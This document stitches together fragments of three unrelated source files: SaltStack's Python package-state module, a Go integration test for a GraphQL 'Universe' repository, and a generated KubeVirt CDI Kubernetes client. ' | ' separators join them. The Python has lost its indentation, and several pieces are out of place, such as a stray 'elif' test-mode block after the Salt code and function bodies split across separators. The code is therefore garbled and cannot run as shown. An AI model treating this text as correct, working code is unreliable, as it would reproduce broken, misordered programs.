desired_pkgs, refresh = _resolve_capabilities(
desired_pkgs, refresh=refresh, **kwargs
)
try:
avail = __salt__["pkg.latest_version"](
*desired_pkgs, fromrepo=fromrepo, refresh=refresh, **kwargs
)
except CommandExecutionError as exc:
return {
"name": name,
"changes": {},
"result": False,
"comment": (
"An error was encountered while checking the "
"newest available version of package(s): {}".format(exc)
),
}
try:
cur = __salt__["pkg.version"](*desired_pkgs, **kwargs)
except CommandExecutionError as exc:
return {"name": name, "changes": {}, "result": False, "comment": exc.strerror}
# Repack the cur/avail data if only a single package is being checked
if isinstance(cur, str):
cur = {desired_pkgs[0]: cur}
if isinstance(avail, str):
avail = {desired_pkgs[0]: avail}
targets = {}
problems = []
for pkg in desired_pkgs:
if not avail.get(pkg):
# Package either a) is up-to-date, or b) does not exist
if not cur.get(pkg):
# Package does not exist
msg = "No information found for '{}'.".format(pkg)
log.error(msg)
problems.append(msg)
elif (
watch_flags
and __grains__.get("os") == "Gentoo"
and __salt__["portage_config.is_changed_uses"](pkg)
):
# Package is up-to-date, but Gentoo USE flags are changing so
# we need to add it to the targets
targets[pkg] = cur[pkg]
else:
# Package either a) is not installed, or b) is installed and has an
# upgrade available
targets[pkg] = avail[pkg]
if problems:
return {
"name": name,
"changes": {},
"result": False,
"comment": " ".join(problems),
}
if targets:
# Find up-to-date packages
if not pkgs:
# There couldn't have been any up-to-date packages if this state
# only targeted a single package and is being allowed to proceed to
# the install step.
up_to_date = []
else:
up_to_date = [x for x in pkgs if x not in targets]
if __opts__["test"]:
comments = []
comments.append(
"The following packages would be installed/upgraded: "
+ ", ".join(sorted(targets))
)
if up_to_date:
up_to_date_count = len(up_to_date)
if up_to_date_count <= 10:
comments.append(
"The following packages are already up-to-date: "
+ ", ".join(
["{} ({})".format(x, cur[x]) for x in sorted(up_to_date)]
)
)
else:
comments.append(
"{} packages are already up-to-date".format(up_to_date_count)
)
return {
"name": name,
"changes": {},
"result": None,
"comment": "\n".join(comments),
}
if salt.utils.platform.is_windows():
# pkg.install execution module on windows ensures the software
# package is installed when no version is specified, it does not
# upgrade the software to the latest. This is per the design.
            # Build updated list of pkgs *with version number*, excluding
            # non-targeted ones
targeted_pkgs = [{x: targets[x]} for x in targets]
else:
# Build updated list of pkgs to exclude non-targeted ones
targeted_pkgs = list(targets)
# No need to refresh, if a refresh was necessary it would have been
# performed above when pkg.latest_version was run.
try:
changes = __salt__["pkg.install"](
name=None,
refresh=False,
fromrepo=fromrepo,
skip_verify=skip_verify,
pkgs=targeted_pkgs,
**kwargs
)
except CommandExecutionError as exc:
return {
"name": name,
"changes": {},
"result": False,
"comment": (
"An error was encountered while installing package(s): {}".format(
exc
)
),
}
if changes:
# Find failed and successful updates
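            # Note: due to Python operator precedence, the condition below reads
            # as "no change reported for x" OR ("the reported new version differs
            # from the target" AND "the target is not the literal string 'latest'").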
failed = [
x
for x in targets
if not changes.get(x)
or changes[x].get("new") != targets[x]
and targets[x] != "latest"
]
successful = [x for x in targets if x not in failed]
comments = []
if failed:
msg = "The following packages failed to update: {}".format(
", ".join(sorted(failed))
)
comments.append(msg)
if successful:
msg = (
"The following packages were successfully "
"installed/upgraded: "
"{}".format(", ".join(sorted(successful)))
)
comments.append(msg)
if up_to_date:
if len(up_to_date) <= 10:
msg = "The following packages were already up-to-date: {}".format(
", ".join(sorted(up_to_date))
)
else:
msg = "{} packages were already up-to-date ".format(len(up_to_date))
comments.append(msg)
return {
"name": name,
"changes": changes,
"result": False if failed else True,
"comment": " ".join(comments),
}
else:
if len(targets) > 10:
comment = (
"{} targeted packages failed to update. "
"See debug log for details.".format(len(targets))
)
elif len(targets) > 1:
comment = (
"The following targeted packages failed to update. "
"See debug log for details: ({}).".format(
", ".join(sorted(targets))
)
)
else:
comment = "Package {} failed to update.".format(
next(iter(list(targets.keys())))
)
if up_to_date:
if len(up_to_date) <= 10:
comment += (
" The following packages were already up-to-date: {}".format(
", ".join(sorted(up_to_date))
)
)
else:
comment += "{} packages were already up-to-date".format(
len(up_to_date)
)
return {
"name": name,
"changes": changes,
"result": False,
"comment": comment,
}
else:
if len(desired_pkgs) > 10:
comment = "All {} packages are up-to-date.".format(len(desired_pkgs))
elif len(desired_pkgs) > 1:
comment = "All packages are up-to-date ({}).".format(
", ".join(sorted(desired_pkgs))
)
else:
comment = "Package {} is already up-to-date".format(desired_pkgs[0])
return {"name": name, "changes": {}, "result": True, "comment": comment}
def _uninstall(
action="remove",
name=None,
version=None,
pkgs=None,
normalize=True,
ignore_epoch=None,
**kwargs
):
"""
Common function for package removal
"""
if action not in ("remove", "purge"):
return {
"name": name,
"changes": {},
"result": False,
"comment": "Invalid action '{}'. This is probably a bug.".format(action),
}
try:
pkg_params = __salt__["pkg_resource.parse_targets"](
name, pkgs, normalize=normalize
)[0]
except MinionError as exc:
return {
"name": name,
"changes": {},
"result": False,
"comment": "An error was encountered while parsing targets: {}".format(exc),
}
targets = _find_remove_targets(
name, version, pkgs, normalize, ignore_epoch=ignore_epoch, **kwargs
)
if isinstance(targets, dict) and "result" in targets:
return targets
elif not isinstance(targets, list):
return {
"name": name,
"changes": {},
"result": False,
"comment": "An error was encountered while checking targets: {}".format(
targets
),
}
if action == "purge":
old_removed = __salt__["pkg.list_pkgs"](
versions_as_list=True, removed=True, **kwargs
)
targets.extend([x for x in pkg_params if x in old_removed])
targets.sort()
if not targets:
return {
"name": name,
"changes": {},
"result": True,
"comment": "None of the targeted packages are installed{}".format(
" or partially installed" if action == "purge" else ""
),
}
if __opts__["test"]:
_changes = {}
_changes.update({x: {"new": "{}d".format(action), "old": ""} for x in targets})
return {
"name": name,
"changes": _changes,
"result": None,
"comment": "The following packages will be {}d: {}.".format(
action, ", ".join(targets)
),
}
changes = __salt__["pkg.{}".format(action)](
name, pkgs=pkgs, version=version, **kwargs
)
new = __salt__["pkg.list_pkgs"](versions_as_list=True, **kwargs)
failed = []
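    # pkg_params (from pkg_resource.parse_targets above) maps each requested
    # package name to the version that was specified for it, or an empty value
    # when no version was given.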
for param in pkg_params:
if __grains__["os_family"] in ["Suse", "RedHat"]:
# Check if the package version set to be removed is actually removed:
if param in new and not pkg_params[param]:
failed.append(param)
elif param in new and pkg_params[param] in new[param]:
failed.append(param + "-" + pkg_params[param])
elif param in new:
failed.append(param)
if action == "purge":
new_removed = __salt__["pkg.list_pkgs"](
versions_as_list=True, removed=True, **kwargs
)
failed.extend([x for x in pkg_params if x in new_removed])
failed.sort()
if failed:
return {
"name": name,
"changes": changes,
"result": False,
"comment": "The following packages failed to {}: {}.".format(
action, ", ".join(failed)
),
}
comments = []
not_installed = sorted([x for x in pkg_params if x not in targets])
if not_installed:
comments.append(
"The following packages were not installed: {}".format(
", ".join(not_installed)
)
)
comments.append(
"The following packages were {}d: {}.".format(action, ", ".join(targets))
)
else:
comments.append("All targeted packages were {}d.".format(action))
return {
"name": name,
"changes": changes,
"result": True,
"comment": " ".join(comments),
}
def removed(name, version=None, pkgs=None, normalize=True, ignore_epoch=None, **kwargs):
"""
Verify that a package is not installed, calling ``pkg.remove`` if necessary
to remove the package.
name
The name of the package to be removed.
version
The version of the package that should be removed. Don't do anything if
the package is installed with an unmatching version.
.. important::
As of version 2015.8.7, for distros which use yum/dnf, packages
which have a version with a nonzero epoch (that is, versions which
start with a number followed by a colon like in the example above)
must have the epoch included when specifying the version number.
For example:
.. code-block:: yaml
vim-enhanced:
pkg.removed:
- version: 2:7.4.160-1.el7
In version 2015.8.9, an **ignore_epoch** argument has been added to
:py:mod:`pkg.installed <salt.states.pkg.installed>`,
:py:mod:`pkg.removed <salt.states.pkg.removed>`, and
:py:mod:`pkg.purged <salt.states.pkg.purged>` states, which
causes the epoch to be disregarded when the state checks to see if
the desired version was installed. If **ignore_epoch** was not set
to ``True``, and instead of ``2:7.4.160-1.el7`` a version of
``7.4.160-1.el7`` were used, this state would report success since
the actual installed version includes the epoch, and the specified
version would not match.
normalize : True
Normalize the package name by removing the architecture, if the
architecture of the package is different from the architecture of the
operating system. The ability to disable this behavior is useful for
poorly-created packages which include the architecture as an actual
part of the name, such as kernel modules which match a specific kernel
version.
.. versionadded:: 2015.8.0
ignore_epoch : None
If this option is not explicitly set, and there is no epoch in the
desired package version, the epoch will be implicitly ignored. Set this
argument to ``True`` to explicitly ignore the epoch, and ``False`` to
strictly enforce it.
.. versionadded:: 2015.8.9
.. versionchanged:: 3001
In prior releases, the default behavior was to strictly enforce
epochs unless this argument was set to ``True``.
Multiple Package Options:
pkgs
A list of packages to remove. Must be passed as a python list. The
``name`` parameter will be ignored if this option is passed. It accepts
version numbers as well.
.. versionadded:: 0.16.0
"""
kwargs["saltenv"] = __env__
try:
return _uninstall(
action="remove",
name=name,
version=version,
pkgs=pkgs,
normalize=normalize,
ignore_epoch=ignore_epoch,
**kwargs
)
except CommandExecutionError as exc:
ret = {"name": name, "result": False}
if exc.info:
# Get information for state return from the exception.
ret["changes"] = exc.info.get("changes", {})
ret["comment"] = exc.strerror_without_changes
else:
ret["changes"] = {}
ret[
"comment"
] = "An error was encountered while removing package(s): {}".format(exc)
return ret
def purged(name, version=None, pkgs=None, normalize=True, ignore_epoch=None, **kwargs):
"""
Verify that a package is not installed, calling ``pkg.purge`` if necessary
to purge the package. All configuration files are also removed.
name
The name of the package to be purged.
version
The version of the package that should be removed. Don't do anything if
the package is installed with an unmatching version.
.. important::
As of version 2015.8.7, for distros which use yum/dnf, packages
which have a version with a nonzero epoch (that is, versions which
start with a number followed by a colon like in the example above)
must have the epoch included when specifying the version number.
For example:
.. code-block:: yaml
vim-enhanced:
pkg.purged:
- version: 2:7.4.160-1.el7
In version 2015.8.9, an **ignore_epoch** argument has been added to
:py:mod:`pkg.installed <salt.states.pkg.installed>`,
:py:mod:`pkg.removed <salt.states.pkg.removed>`, and
:py:mod:`pkg.purged <salt.states.pkg.purged>` states, which
causes the epoch to be disregarded when the state checks to see if
the desired version was installed. If **ignore_epoch** was not set
to ``True``, and instead of ``2:7.4.160-1.el7`` a version of
``7.4.160-1.el7`` were used, this state would report success since
the actual installed version includes the epoch, and the specified
version would not match.
normalize : True
Normalize the package name by removing the architecture, if the
architecture of the package is different from the architecture of the
operating system. The ability to disable this behavior is useful for
poorly-created packages which include the architecture as an actual
part of the name, such as kernel modules which match a specific kernel
version.
.. versionadded:: 2015.8.0
ignore_epoch : None
If this option is not explicitly set, and there is no epoch in the
desired package version, the epoch will be implicitly ignored. Set this
argument to ``True`` to explicitly ignore the epoch, and ``False`` to
strictly enforce it.
.. versionadded:: 2015.8.9
.. versionchanged:: 3001
In prior releases, the default behavior was to strictly enforce
epochs unless this argument was set to ``True``.
Multiple Package Options:
pkgs
A list of packages to purge. Must be passed as a python list. The
``name`` parameter will be ignored if this option is passed. It accepts
version numbers as well.
.. versionadded:: 0.16.0
"""
kwargs["saltenv"] = __env__
try:
return _uninstall(
action="purge",
name=name,
version=version,
pkgs=pkgs,
normalize=normalize,
ignore_epoch=ignore_epoch,
**kwargs
)
except CommandExecutionError as exc:
ret = {"name": name, "result": False}
if exc.info:
# Get information for state return from the exception.
ret["changes"] = exc.info.get("changes", {})
ret["comment"] = exc.strerror_without_changes
else:
ret["changes"] = {}
ret[
"comment"
] = "An error was encountered while purging package(s): {}".format(exc)
return ret
def uptodate(name, refresh=False, pkgs=None, **kwargs):
"""
.. versionadded:: 2014.7.0
.. versionchanged:: 2018.3.0
Added support for the ``pkgin`` provider.
Verify that the system is completely up to date.
name
The name has no functional value and is only used as a tracking
reference
refresh
refresh the package database before checking for new upgrades
pkgs
list of packages to upgrade
:param str cache_valid_time:
        This parameter sets the value in seconds after which the cache is
        marked as invalid, and a cache update is necessary. This overwrites
        the ``refresh`` parameter's default behavior.
        If cache_valid_time is set, a refresh will not take place for that
        number of seconds since the last ``apt-get update`` was executed on
        the system.
        .. note::
            This parameter is available only on Debian based distributions and
            has no effect on the rest.
:param bool resolve_capabilities:
        Turn on resolving capabilities. This allows one to name "provides" or alias names for packages.
.. versionadded:: 2018.3.0
kwargs
Any keyword arguments to pass through to ``pkg.upgrade``.
.. versionadded:: 2015.5.0
"""
ret = {"name": name, "changes": {}, "result": False, "comment": "Failed to update"}
if "pkg.list_upgrades" not in __salt__:
ret["comment"] = "State pkg.uptodate is not available"
return ret
# emerge --update doesn't appear to support repo notation
if "fromrepo" in kwargs and __grains__["os"] == "Gentoo":
ret["comment"] = "'fromrepo' argument not supported on this platform"
return ret
if isinstance(refresh, bool):
pkgs, refresh = _resolve_capabilities(pkgs, refresh=refresh, **kwargs)
try:
packages = __salt__["pkg.list_upgrades"](refresh=refresh, **kwargs)
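            # Build the expected changes up front: for each upgradable package,
            # record the currently installed version as 'old' and the candidate
            # version reported by pkg.list_upgrades as 'new'.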
expected = {
pkgname: {
"new": pkgver,
"old": __salt__["pkg.version"](pkgname, **kwargs),
}
for pkgname, pkgver in packages.items()
}
if isinstance(pkgs, list):
packages = [pkg for pkg in packages if pkg in pkgs]
expected = {
pkgname: pkgver
for pkgname, pkgver in expected.items()
if pkgname in pkgs
}
except Exception as exc: # pylint: disable=broad-except
ret["comment"] = str(exc)
return ret
else:
ret["comment"] = "refresh must be either True or False"
return ret
if not packages:
ret["comment"] = "System is already up-to-date"
ret["result"] = True
return ret | return ret
try:
ret["changes"] = __salt__["pkg.upgrade"](refresh=refresh, pkgs=pkgs, **kwargs)
except CommandExecutionError as exc:
if exc.info:
# Get information for state return from the exception.
ret["changes"] = exc.info.get("changes", {})
ret["comment"] = exc.strerror_without_changes
else:
ret["changes"] = {}
ret[
"comment"
] = "An error was encountered while updating packages: {}".format(exc)
return ret
# If a package list was provided, ensure those packages were updated
missing = []
if isinstance(pkgs, list):
missing = [pkg for pkg in expected.keys() if pkg not in ret["changes"]]
if missing:
ret["comment"] = "The following package(s) failed to update: {}".format(
", ".join(missing)
)
ret["result"] = False
else:
ret["comment"] = "Upgrade ran successfully"
ret["result"] = True
return ret
def group_installed(name, skip=None, include=None, **kwargs):
"""
.. versionadded:: 2015.8.0
.. versionchanged:: 2016.11.0
Added support in :mod:`pacman <salt.modules.pacman>`
Ensure that an entire package group is installed. This state is currently
only supported for the :mod:`yum <salt.modules.yumpkg>` and :mod:`pacman <salt.modules.pacman>`
package managers.
skip
Packages that would normally be installed by the package group
("default" packages), which should not be installed.
.. code-block:: yaml
Load Balancer:
pkg.group_installed:
- skip:
- piranha
include
Packages which are included in a group, which would not normally be
installed by a ``yum groupinstall`` ("optional" packages). Note that
this will not enforce group membership; if you include packages which
are not members of the specified groups, they will still be installed.
.. code-block:: yaml
Load Balancer:
pkg.group_installed:
- include:
- haproxy
.. versionchanged:: 2016.3.0
This option can no longer be passed as a comma-separated list, it
must now be passed as a list (as shown in the above example).
.. note::
Because this is essentially a wrapper around :py:func:`pkg.install
<salt.modules.yumpkg.install>`, any argument which can be passed to
pkg.install may also be included here, and it will be passed on to the
call to :py:func:`pkg.install <salt.modules.yumpkg.install>`.
"""
ret = {"name": name, "changes": {}, "result": False, "comment": ""}
if "pkg.group_diff" not in __salt__:
ret["comment"] = "pkg.group_install not available for this platform"
return ret
if skip is None:
skip = []
else:
if not isinstance(skip, list):
ret["comment"] = "skip must be formatted as a list"
return ret
for idx, item in enumerate(skip):
if not isinstance(item, str):
skip[idx] = str(item)
if include is None:
include = []
else:
if not isinstance(include, list):
ret["comment"] = "include must be formatted as a list"
return ret
for idx, item in enumerate(include):
if not isinstance(item, str):
include[idx] = str(item)
try:
diff = __salt__["pkg.group_diff"](name)
except CommandExecutionError as err:
ret[
"comment"
] = "An error was encountered while installing/updating group '{}': {}.".format(
name, err
)
return ret
mandatory = diff["mandatory"]["installed"] + diff["mandatory"]["not installed"]
invalid_skip = [x for x in mandatory if x in skip]
if invalid_skip:
ret[
"comment"
] = "The following mandatory packages cannot be skipped: {}".format(
", ".join(invalid_skip)
)
return ret
targets = diff["mandatory"]["not installed"]
targets.extend([x for x in diff["default"]["not installed"] if x not in skip])
targets.extend(include)
if not targets:
ret["result"] = True
ret["comment"] = "Group '{}' is already installed".format(name)
return ret
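    # "Partially installed" means at least one mandatory, default, or optional
    # member of the group is already present; this only affects the wording of
    # the comments below ("updated" vs. "installed"), not what gets installed.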
partially_installed = (
diff["mandatory"]["installed"]
or diff["default"]["installed"]
or diff["optional"]["installed"]
)
if __opts__["test"]:
ret["result"] = None
if partially_installed:
ret[
"comment"
] = "Group '{}' is partially installed and will be updated".format(name)
else:
ret["comment"] = "Group '{}' will be installed".format(name)
return ret
try:
ret["changes"] = __salt__["pkg.install"](pkgs=targets, **kwargs)
except CommandExecutionError as exc:
ret = {"name": name, "result": False}
if exc.info:
# Get information for state return from the exception.
ret["changes"] = exc.info.get("changes", {})
ret["comment"] = exc.strerror_without_changes
else:
ret["changes"] = {}
ret["comment"] = (
"An error was encountered while "
"installing/updating group '{}': {}".format(name, exc)
)
return ret
failed = [x for x in targets if x not in __salt__["pkg.list_pkgs"](**kwargs)]
if failed:
ret["comment"] = "Failed to install the following packages: {}".format(
", ".join(failed)
)
return ret
ret["result"] = True
ret["comment"] = "Group '{}' was {}".format(
name, "updated" if partially_installed else "installed"
)
return ret
def mod_init(low):
"""
Set a flag to tell the install functions to refresh the package database.
This ensures that the package database is refreshed only once during
    a state run, significantly improving the speed of package management.
It sets a flag for a number of reasons, primarily due to timeline logic.
When originally setting up the mod_init for pkg a number of corner cases
arose with different package managers and how they refresh package data.
It also runs the "ex_mod_init" from the package manager module that is
currently loaded. The "ex_mod_init" is expected to work as a normal
"mod_init" function.
.. seealso::
:py:func:`salt.modules.ebuild.ex_mod_init`
"""
ret = True
if "pkg.ex_mod_init" in __salt__:
ret = __salt__["pkg.ex_mod_init"](low)
if low["fun"] == "installed" or low["fun"] == "latest":
salt.utils.pkg.write_rtag(__opts__)
return ret
return False
def mod_aggregate(low, chunks, running):
"""
The mod_aggregate function which looks up all packages in the available
low chunks and merges them into a single pkgs ref in the present low data
"""
pkgs = []
pkg_type = None
agg_enabled = [
"installed",
"latest",
"removed",
"purged",
]
if low.get("fun") not in agg_enabled:
return low
for chunk in chunks:
tag = __utils__["state.gen_tag"](chunk)
if tag in running:
# Already ran the pkg state, skip aggregation
continue
if chunk.get("state") == "pkg":
if "__agg__" in chunk:
continue
# Check for the same function
if chunk.get("fun") != low.get("fun"):
continue
# Check for the same repo
if chunk.get("fromrepo") != low.get("fromrepo"):
continue
# Check first if 'sources' was passed so we don't aggregate pkgs
# and sources together.
if "sources" in chunk:
if pkg_type is None:
pkg_type = "sources"
if pkg_type == "sources":
pkgs.extend(chunk["sources"])
chunk["__agg__"] = True
else:
                # If hold exists in the chunk, do not add it to the aggregation,
                # otherwise all packages will be held or unheld.
                # Setting a package to be held/unheld is not as
                # time consuming as installing/uninstalling it.
if "hold" not in chunk:
if pkg_type is None:
pkg_type = "pkgs"
if pkg_type == "pkgs":
# Pull out the pkg names!
if "pkgs" in chunk:
pkgs.extend(chunk["pkgs"])
chunk["__agg__"] = True
elif "name" in chunk:
version = chunk.pop("version", None)
if version is not None:
pkgs.append({chunk["name"]: version})
else:
pkgs.append(chunk["name"])
chunk["__agg__"] = True
if pkg_type is not None and pkgs:
if pkg_type in low:
low[pkg_type].extend(pkgs)
else:
low[pkg_type] = pkgs
return low
def mod_watch(name, **kwargs):
"""
Install/reinstall a package based on a watch requisite
.. note::
This state exists to support special handling of the ``watch``
:ref:`requisite <requisites>`. It should not be called directly.
Parameters for this function should be set by the state being triggered.
"""
sfun = kwargs.pop("sfun", None)
mapfun = {
"purged": purged,
"latest": latest,
"removed": removed,
"installed": installed,
}
if sfun in mapfun:
return mapfun[sfun](name, **kwargs)
return {
"name": name,
"changes": {},
"comment": "pkg.{} does not work with the watch requisite".format(sfun),
"result": False,
}
def mod_beacon(name, **kwargs):
"""
Create a beacon to monitor a package or packages
based on a beacon state argument.
.. note::
This state exists to support special handling of the ``beacon``
state argument for supported state functions. It should not be called directly.
"""
ret = {"name": name, "changes": {}, "result": True, "comment": ""}
sfun = kwargs.pop("sfun", None)
supported_funcs = ["installed", "removed"]
if sfun in supported_funcs:
if kwargs.get("beacon"):
beacon_module = "pkg"
beacon_name = "beacon_{}_{}".format(beacon_module, name)
beacon_kwargs = {
"name": beacon_name,
"pkgs": kwargs.get("pkgs", [name]),
"interval": 60,
"beacon_module": beacon_module,
}
ret = __states__["beacon.present"](**beacon_kwargs)
return ret
else:
return {
"name": name,
"changes": {},
"comment": "Not adding beacon.",
"result": True,
}
else:
return {
"name": name,
"changes": {},
"comment": "pkg.{} does not work with the mod_beacon state function".format(
sfun
),
"result": False,
} | elif __opts__["test"]:
ret["comment"] = "System update will be performed"
ret["changes"] = expected
ret["result"] = None |
repository_test.go | //go:build all || integration
// +build all integration
package agora
import (
"context"
"log"
"os"
"testing"
"github.com/joho/godotenv"
"github.com/shurcooL/graphql"
)
var graphqlUri string = "http://localhost:8080/graphql"
func init() {
	if err := godotenv.Load(); err != nil {
		log.Fatal(err)
	}
	// Only override the compiled-in default when GRAPHQL_URI is actually set.
	if uri := os.Getenv("GRAPHQL_URI"); uri != "" {
		graphqlUri = uri
	}
}
func TestDgraphUniverseRepositoryFind(t *testing.T) {
wantUniverse := &Universe{
Name: "TestDgraphUniverseRepositoryFind_name",
User: "TestDgraphUniverseRepositoryFind_user",
Description: "TestDgraphUniverseRepositoryFind_description",
}
graphql := graphql.NewClient(graphqlUri, nil)
repo := &GraphqlUniverseRepository{graphql}
ctx := context.Background()
if err := repo.Insert(ctx, wantUniverse); err != nil {
t.Fatal(err)
}
defer func(u *Universe) {
if err := repo.Delete(ctx, u); err != nil {
t.Fatal(err)
}
}(wantUniverse)
if len(wantUniverse.Id) == 0 {
t.Fatalf("Got empty universe Id") | if gotUniverse, err := repo.Find(ctx, wantUniverse.Id); err != nil {
t.Fatal(err)
} else if gotUniverse.Id != wantUniverse.Id {
t.Errorf("Got id = %v, want %v", gotUniverse.Id, wantUniverse.Id)
} else if gotUniverse.Name != wantUniverse.Name {
t.Errorf("Got name = %s, want %s", gotUniverse.Name, wantUniverse.Name)
} else if gotUniverse.User != wantUniverse.User {
t.Errorf("Got user = %s, want %s", gotUniverse.User, wantUniverse.User)
} else if gotUniverse.Description != wantUniverse.Description {
t.Errorf("Got description = %s, want %s", gotUniverse.Description, wantUniverse.Description)
}
}
func TestDgraphUniverseRepositoryFindByNameAndUser(t *testing.T) {
wantUniverse := &Universe{
Name: "TestDgraphUniverseRepositoryFindByNameAndUser_name",
User: "TestDgraphUniverseRepositoryFindByNameAndUser_user",
Description: "TestDgraphUniverseRepositoryFindByNameAndUser_description",
}
graphql := graphql.NewClient(graphqlUri, nil)
repo := &GraphqlUniverseRepository{graphql}
ctx := context.Background()
if err := repo.Insert(ctx, wantUniverse); err != nil {
t.Fatal(err)
}
defer func(u *Universe) {
if err := repo.Delete(ctx, u); err != nil {
t.Fatal(err)
}
}(wantUniverse)
if len(wantUniverse.Id) == 0 {
t.Fatalf("Got empty universe Id")
}
if gotUniverse, err := repo.FindByNameAndUser(ctx, wantUniverse.Name, wantUniverse.User); err != nil {
t.Fatal(err)
} else if gotUniverse.Id != wantUniverse.Id {
t.Errorf("Got id = %v, want %v", gotUniverse.Id, wantUniverse.Id)
} else if gotUniverse.Name != wantUniverse.Name {
t.Errorf("Got name = %s, want %s", gotUniverse.Name, wantUniverse.Name)
} else if gotUniverse.User != wantUniverse.User {
t.Errorf("Got user = %s, want %s", gotUniverse.User, wantUniverse.User)
} else if gotUniverse.Description != wantUniverse.Description {
t.Errorf("Got description = %s, want %s", gotUniverse.Description, wantUniverse.Description)
}
}
func TestDgraphUniverseRepositoryUpdate(t *testing.T) {
wantUniverse := &Universe{
Name: "TestDgraphUniverseRepositoryUpdate_name_before",
User: "TestDgraphUniverseRepositoryUpdate_user_before",
Description: "TestDgraphUniverseRepositoryUpdate_description_before",
}
graphql := graphql.NewClient(graphqlUri, nil)
repo := &GraphqlUniverseRepository{graphql}
ctx := context.Background()
if err := repo.Insert(ctx, wantUniverse); err != nil {
t.Fatal(err)
}
defer func(u *Universe) {
if err := repo.Delete(ctx, u); err != nil {
t.Fatal(err)
}
}(wantUniverse)
if len(wantUniverse.Id) == 0 {
t.Fatalf("Got empty universe Id")
}
wantUniverse.Name = "TestDgraphUniverseRepositoryUpdate_name_after"
wantUniverse.User = "TestDgraphUniverseRepositoryUpdate_user_after"
wantUniverse.Description = "TestDgraphUniverseRepositoryUpdate_description_after"
if err := repo.Update(ctx, wantUniverse); err != nil {
t.Fatal(err)
}
if gotUniverse, err := repo.Find(ctx, wantUniverse.Id); err != nil {
t.Fatal(err)
} else if gotUniverse.Id != wantUniverse.Id {
t.Errorf("Got id = %v, want %v", gotUniverse.Id, wantUniverse.Id)
} else if gotUniverse.Name != wantUniverse.Name {
t.Errorf("Got name = %s, want %s", gotUniverse.Name, wantUniverse.Name)
} else if gotUniverse.User != wantUniverse.User {
t.Errorf("Got user = %s, want %s", gotUniverse.User, wantUniverse.User)
} else if gotUniverse.Description != wantUniverse.Description {
t.Errorf("Got description = %s, want %s", gotUniverse.Description, wantUniverse.Description)
}
} | }
|
cdi.go | /*
Copyright 2022 The KubeVirt Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by client-gen. DO NOT EDIT.
package v1beta1
import (
"context"
"time"
v1 "k8s.io/apimachinery/pkg/apis/meta/v1"
types "k8s.io/apimachinery/pkg/types"
watch "k8s.io/apimachinery/pkg/watch"
rest "k8s.io/client-go/rest"
scheme "kubevirt.io/client-go/generated/containerized-data-importer/clientset/versioned/scheme"
v1beta1 "kubevirt.io/containerized-data-importer-api/pkg/apis/core/v1beta1"
)
// CDIsGetter has a method to return a CDIInterface.
// A group's client should implement this interface.
type CDIsGetter interface {
CDIs() CDIInterface
}
// CDIInterface has methods to work with CDI resources.
type CDIInterface interface {
Create(ctx context.Context, cDI *v1beta1.CDI, opts v1.CreateOptions) (*v1beta1.CDI, error)
Update(ctx context.Context, cDI *v1beta1.CDI, opts v1.UpdateOptions) (*v1beta1.CDI, error)
UpdateStatus(ctx context.Context, cDI *v1beta1.CDI, opts v1.UpdateOptions) (*v1beta1.CDI, error)
Delete(ctx context.Context, name string, opts v1.DeleteOptions) error
DeleteCollection(ctx context.Context, opts v1.DeleteOptions, listOpts v1.ListOptions) error
Get(ctx context.Context, name string, opts v1.GetOptions) (*v1beta1.CDI, error)
List(ctx context.Context, opts v1.ListOptions) (*v1beta1.CDIList, error)
Watch(ctx context.Context, opts v1.ListOptions) (watch.Interface, error)
Patch(ctx context.Context, name string, pt types.PatchType, data []byte, opts v1.PatchOptions, subresources ...string) (result *v1beta1.CDI, err error)
CDIExpansion
}
// cDIs implements CDIInterface
type cDIs struct {
client rest.Interface
}
// newCDIs returns a CDIs
func newCDIs(c *CdiV1beta1Client) *cDIs |
// Get takes name of the cDI, and returns the corresponding cDI object, and an error if there is any.
func (c *cDIs) Get(ctx context.Context, name string, options v1.GetOptions) (result *v1beta1.CDI, err error) {
result = &v1beta1.CDI{}
err = c.client.Get().
Resource("cdis").
Name(name).
VersionedParams(&options, scheme.ParameterCodec).
Do(ctx).
Into(result)
return
}
// List takes label and field selectors, and returns the list of CDIs that match those selectors.
func (c *cDIs) List(ctx context.Context, opts v1.ListOptions) (result *v1beta1.CDIList, err error) {
var timeout time.Duration
if opts.TimeoutSeconds != nil {
timeout = time.Duration(*opts.TimeoutSeconds) * time.Second
}
result = &v1beta1.CDIList{}
err = c.client.Get().
Resource("cdis").
VersionedParams(&opts, scheme.ParameterCodec).
Timeout(timeout).
Do(ctx).
Into(result)
return
}
// Watch returns a watch.Interface that watches the requested cDIs.
func (c *cDIs) Watch(ctx context.Context, opts v1.ListOptions) (watch.Interface, error) {
var timeout time.Duration
if opts.TimeoutSeconds != nil {
timeout = time.Duration(*opts.TimeoutSeconds) * time.Second
}
opts.Watch = true
return c.client.Get().
Resource("cdis").
VersionedParams(&opts, scheme.ParameterCodec).
Timeout(timeout).
Watch(ctx)
}
// Create takes the representation of a cDI and creates it. Returns the server's representation of the cDI, and an error, if there is any.
func (c *cDIs) Create(ctx context.Context, cDI *v1beta1.CDI, opts v1.CreateOptions) (result *v1beta1.CDI, err error) {
result = &v1beta1.CDI{}
err = c.client.Post().
Resource("cdis").
VersionedParams(&opts, scheme.ParameterCodec).
Body(cDI).
Do(ctx).
Into(result)
return
}
// Update takes the representation of a cDI and updates it. Returns the server's representation of the cDI, and an error, if there is any.
func (c *cDIs) Update(ctx context.Context, cDI *v1beta1.CDI, opts v1.UpdateOptions) (result *v1beta1.CDI, err error) {
result = &v1beta1.CDI{}
err = c.client.Put().
Resource("cdis").
Name(cDI.Name).
VersionedParams(&opts, scheme.ParameterCodec).
Body(cDI).
Do(ctx).
Into(result)
return
}
// UpdateStatus was generated because the type contains a Status member.
// Add a +genclient:noStatus comment above the type to avoid generating UpdateStatus().
func (c *cDIs) UpdateStatus(ctx context.Context, cDI *v1beta1.CDI, opts v1.UpdateOptions) (result *v1beta1.CDI, err error) {
result = &v1beta1.CDI{}
err = c.client.Put().
Resource("cdis").
Name(cDI.Name).
SubResource("status").
VersionedParams(&opts, scheme.ParameterCodec).
Body(cDI).
Do(ctx).
Into(result)
return
}
// Delete takes name of the cDI and deletes it. Returns an error if one occurs.
func (c *cDIs) Delete(ctx context.Context, name string, opts v1.DeleteOptions) error {
return c.client.Delete().
Resource("cdis").
Name(name).
Body(&opts).
